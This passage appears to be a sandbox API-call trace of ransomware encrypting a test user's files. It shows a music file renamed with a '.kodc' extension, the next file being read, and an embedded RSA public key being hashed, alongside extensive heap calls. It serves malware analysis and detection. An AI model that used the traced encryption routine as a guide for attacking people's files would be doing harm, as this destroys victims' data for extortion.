(in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dba0 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.113] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x10457, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x10457, lpOverlapped=0x0) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.113] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1045c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.113] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.114] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.114] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.114] CloseHandle (hObject=0x5cc) returned 1 [0099.116] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uaPM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uapm.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uaPM.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uapm.m4a.kodc")) returned 1 [0099.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.116] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.117] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vzirrPIdRoa4G1GJ", cAlternateFileName="VZIRRP~1")) returned 1 [0099.117] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a3d8c60, ftCreationTime.dwHighDateTime=0x1d5bfd5, ftLastAccessTime.dwLowDateTime=0x9cb2a750, ftLastAccessTime.dwHighDateTime=0x1d5bb1c, ftLastWriteTime.dwLowDateTime=0x9cb2a750, ftLastWriteTime.dwHighDateTime=0x1d5bb1c, nFileSizeHigh=0x0, nFileSizeLow=0xb6c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNcyJIAdvLtk.wav", cAlternateFileName="WNCYJI~1.WAV")) returned 1 [0099.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wNcyJIAdvLtk.wav") returned=".wav" [0099.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wNcyJIAdvLtk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wncyjiadvltk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.118] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=46793) returned 1 [0099.118] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.121] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb6a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.121] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.121] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xb6c9, lpOverlapped=0x0) returned 1 [0099.122] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.122] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.122] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.122] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.123] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.123] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.123] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.123] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.123] GetLastError () returned 0x0 [0099.123] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.123] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.123] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.123] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.123] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb6d0) returned 0x9ba4d90 [0099.124] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dba0 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dbe8 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.124] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ada8 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad90 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.125] GetCurrentThreadId () returned 0x42c [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b90288 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.125] GetCurrentThreadId () returned 0x42c [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331adc0 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: 